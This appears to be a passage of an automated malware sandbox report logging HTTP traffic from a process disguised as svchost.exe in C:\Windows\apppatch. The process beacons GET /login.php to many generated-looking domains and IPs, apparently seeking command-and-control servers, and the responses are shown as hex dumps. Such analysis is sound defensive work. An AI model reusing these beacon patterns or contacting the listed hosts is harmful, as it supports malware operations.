                                                                                                                                                                                                            Set-Cookie: btst=f4a499917f55ce41da5d9625f93ee92d|66.23.206.109|1731345870|1731345870|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.104973644.221.84.105807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.065094948 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vocyzit.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.492614031 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=3e4d030d1d6f471974f78bdc2d59d83c|66.23.206.109|1731345870|1731345870|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.1049737199.191.50.83807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.098906040 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619031906 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            Set-Cookie: vsid=904vr478891470623201756; expires=Sat, 10-Nov-2029 17:24:30 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Data Raw: 61 38 34 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69
                                                                                                                                                                                                            Data Ascii: a841<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <scri
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619102955 CET212INData Raw: 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 21 22 67 64 70 72 41 70 70 6c 69
                                                                                                                                                                                                            Data Ascii: pt>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid"
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619113922 CET1212INData Raw: 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 69 64 3d 22 32 31 66 64 63 61 32 32 38 31 38 33 33 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 61 72 61 6d 73 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63
                                                                                                                                                                                                            Data Ascii: in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!(
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619133949 CET1236INData Raw: 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 6e 61 76 69 67 61 74 6f 72 3f 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3a 5b 5d 3b 69 66 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70
                                                                                                                                                                                                            Data Ascii: ion.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase(
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619155884 CET1236INData Raw: 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 69 66 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f
                                                                                                                                                                                                            Data Ascii: .indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cm
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619170904 CET424INData Raw: 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e 62 6f 64 79 29 7b 75 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 76 61 72 20 74 3d 76 28 22 62 6f 64 79 22 29 3b 69
                                                                                                                                                                                                            Data Ascii: lement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].ap
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619187117 CET1236INData Raw: 75 67 63 6f 76 65 72 61 67 65 3a 22 22 29 3b 69 66 28 61 3d 3d 22 31 22 29 7b 6d 3d 22 69 6e 73 74 72 75 6d 65 6e 74 65 64 22 3b 70 3d 22 22 7d 76 61 72 20 6a 3d 75 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6a 2e
                                                                                                                                                                                                            Data Ascii: ugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619201899 CET1188INData Raw: 2e 73 75 62 73 74 72 69 6e 67 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 29 7d 65 6c 73 65 7b 76 61 72 20 63 3d 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62
                                                                                                                                                                                                            Data Ascii: .substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a|
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619215965 CET1236INData Raw: 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 69 66 28 21 28 22 6c 61 73 74 49 64 22 20 69 6e 20 5f 5f 67 70 70 29 29 7b 5f 5f 67 70 70 2e 6c 61 73 74 49 64 3d 30 7d 5f 5f 67 70 70
                                                                                                                                                                                                            Data Ascii: dEventListener"){__gpp.e=__gpp.e||[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.619227886 CET1236INData Raw: 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e
                                                                                                                                                                                                            Data Ascii: eturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiRe
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.624108076 CET1236INData Raw: 61 6c 73 65 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 63 6d 70 4c 6f 63 61 74 6f 72 22 29 3b 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e
                                                                                                                                                                                                            Data Ascii: alse)}};window.cmp_addFrame("__cmpLocator");if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!(


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.104973823.253.46.64807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.198434114 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884193897 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:24 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884222031 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.884351015 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            11192.168.2.1049741154.212.231.82807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.443002939 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.354679108 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.355887890 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:24:31.720772028 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            12192.168.2.1049747178.162.203.202807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.648385048 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            13192.168.2.1049974178.162.203.202807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:01.584044933 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            14192.168.2.104999413.248.169.48807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.037652016 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupydeq.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.468385935 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:10 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            15192.168.2.1064052188.114.97.3807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.223046064 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.891809940 CET961INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:10 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WvZ3htjN%2FstHfLAPNn%2BTxHL6ZeUx4rihYagq2EFcJe7gpnqB0sKs0oBOmXyCH33TGnI4IHsVz06c5IU6oVXkVC4cxDdwEE6xMUjbKXeaID7jOXthoUlSa14UVqtaGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ffae52eeb8c23-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
